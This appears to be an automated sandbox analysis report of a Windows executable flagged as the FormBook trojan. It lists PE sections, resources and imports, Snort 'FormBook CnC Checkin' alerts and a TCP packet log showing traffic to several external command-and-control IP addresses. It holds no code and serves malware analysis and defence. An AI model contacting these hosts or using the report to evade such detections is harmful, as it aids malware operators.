                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc80000x590100x59200c3d3ccba5171c79fdd0f5094d9b0d61dFalse0.9275754952664796data7.896666235899599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1220000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xd04100x506a6data1.0003369947355958
                                                          RT_GROUP_ICON0x120ab80x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x120b300x14dataEnglishGreat Britain1.15
                                                          RT_VERSION0x120b440xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x120c200x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          07/13/24-00:03:27.012872TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972880192.168.2.637.9.175.173
                                                          07/13/24-00:03:53.802060TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.63.33.130.190
                                                          07/13/24-00:04:33.327718TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.63.33.130.190
                                                          07/13/24-00:02:48.729631TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.63.33.130.190
                                                          07/13/24-00:05:54.908226TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977680192.168.2.65.78.41.174
                                                          07/13/24-00:05:28.251797TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976880192.168.2.63.33.130.190
                                                          07/13/24-00:03:40.530049TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.6203.161.41.207
                                                          07/13/24-00:04:46.484649TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975580192.168.2.6188.114.96.3
                                                          07/13/24-00:03:13.390597TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972480192.168.2.6162.43.105.95
                                                          07/13/24-00:05:00.043647TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.645.130.41.38
                                                          07/13/24-00:04:06.889781TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.63.33.130.190
                                                          07/13/24-00:05:14.257772TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976380192.168.2.63.33.130.190
                                                          07/13/24-00:05:41.372349TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977280192.168.2.6103.176.91.154
                                                          07/13/24-00:04:20.054098TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.651.89.93.192

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 13, 2024 00:02:48.722065926 CEST4971880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:02:48.727324009 CEST80497183.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:02:48.727552891 CEST4971880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:02:48.729630947 CEST4971880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:02:48.734525919 CEST80497183.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:02:49.193123102 CEST80497183.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:02:49.193289042 CEST80497183.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:02:49.193367004 CEST4971880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:02:49.196209908 CEST4971880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:02:49.201077938 CEST80497183.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:05.780431986 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:05.785403967 CEST8049720162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:05.785533905 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:05.787103891 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:05.791898966 CEST8049720162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:06.594902992 CEST8049720162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:06.594926119 CEST8049720162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:06.594978094 CEST8049720162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:06.595040083 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:06.595040083 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:07.300868988 CEST4972080192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:08.320368052 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:08.325402021 CEST8049722162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:08.325510025 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:08.328007936 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:08.332791090 CEST8049722162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:09.169740915 CEST8049722162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:09.169766903 CEST8049722162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:09.169830084 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:09.169838905 CEST8049722162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:09.169914961 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:09.834036112 CEST4972280192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:10.850405931 CEST4972380192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:10.857070923 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:10.857156038 CEST4972380192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:10.859141111 CEST4972380192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:10.865377903 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:10.866471052 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:11.663120031 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:11.663170099 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:11.663183928 CEST8049723162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:11.663259029 CEST4972380192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:12.363297939 CEST4972380192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:13.381617069 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:13.388899088 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:13.388988018 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:13.390597105 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:13.397569895 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:14.196311951 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:14.196331978 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:14.196342945 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:14.196419001 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:14.196533918 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:14.196629047 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:14.199215889 CEST4972480192.168.2.6162.43.105.95
                                                          Jul 13, 2024 00:03:14.203983068 CEST8049724162.43.105.95192.168.2.6
                                                          Jul 13, 2024 00:03:19.285409927 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:19.292323112 CEST804972537.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:19.292392969 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:19.293894053 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:19.300030947 CEST804972537.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:20.056786060 CEST804972537.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:20.056868076 CEST804972537.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:20.056917906 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:20.057097912 CEST804972537.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:20.057136059 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:20.800729990 CEST4972580192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:21.844384909 CEST4972680192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:21.930886984 CEST804972637.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:21.931005955 CEST4972680192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:21.932615995 CEST4972680192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:21.940715075 CEST804972637.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:22.665031910 CEST804972637.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:22.665676117 CEST804972637.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:22.665771008 CEST4972680192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:23.441420078 CEST4972680192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:24.460939884 CEST4972780192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:24.467514038 CEST804972737.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:24.470588923 CEST4972780192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:24.473283052 CEST4972780192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:24.479578018 CEST804972737.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:24.482062101 CEST804972737.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:25.168262959 CEST804972737.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:25.168282986 CEST804972737.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:25.168370008 CEST4972780192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:25.988270044 CEST4972780192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.006433010 CEST4972880192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.011269093 CEST804972837.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:27.011383057 CEST4972880192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.012871981 CEST4972880192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.017610073 CEST804972837.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:27.696687937 CEST804972837.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:27.696705103 CEST804972837.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:27.696943998 CEST4972880192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.698703051 CEST4972880192.168.2.637.9.175.173
                                                          Jul 13, 2024 00:03:27.703464031 CEST804972837.9.175.173192.168.2.6
                                                          Jul 13, 2024 00:03:32.920265913 CEST4972980192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:32.926632881 CEST8049729203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:32.926714897 CEST4972980192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:32.928778887 CEST4972980192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:32.935408115 CEST8049729203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:33.536286116 CEST8049729203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:33.536573887 CEST8049729203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:33.536624908 CEST4972980192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:34.441368103 CEST4972980192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:35.461092949 CEST4973280192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:35.465962887 CEST8049732203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:35.466995001 CEST4973280192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:35.469006062 CEST4973280192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:35.473786116 CEST8049732203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:36.064721107 CEST8049732203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:36.064804077 CEST8049732203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:36.064974070 CEST4973280192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:36.972632885 CEST4973280192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:37.991241932 CEST4973380192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:37.996208906 CEST8049733203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:37.996275902 CEST4973380192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:37.998825073 CEST4973380192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:38.006928921 CEST8049733203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:38.006943941 CEST8049733203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:38.602013111 CEST8049733203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:38.602036953 CEST8049733203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:38.602085114 CEST4973380192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:39.503864050 CEST4973380192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:40.521823883 CEST4973480192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:40.528146982 CEST8049734203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:40.530049086 CEST4973480192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:40.530049086 CEST4973480192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:40.536375046 CEST8049734203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:41.148921013 CEST8049734203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:41.148983955 CEST8049734203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:41.149089098 CEST4973480192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:41.151207924 CEST4973480192.168.2.6203.161.41.207
                                                          Jul 13, 2024 00:03:41.157963037 CEST8049734203.161.41.207192.168.2.6
                                                          Jul 13, 2024 00:03:46.184536934 CEST4973580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:46.190416098 CEST80497353.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:46.190532923 CEST4973580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:46.192123890 CEST4973580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:46.199376106 CEST80497353.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:46.647609949 CEST80497353.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:46.647687912 CEST4973580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:47.707427025 CEST4973580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:47.712342024 CEST80497353.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:48.726022005 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:48.732530117 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:48.732610941 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:48.734755993 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:48.740776062 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:50.122663975 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:50.129096985 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:50.242172003 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:50.248642921 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.256979942 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.264339924 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.264416933 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.266316891 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.273052931 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.275717974 CEST80497373.33.130.190192.168.2.6
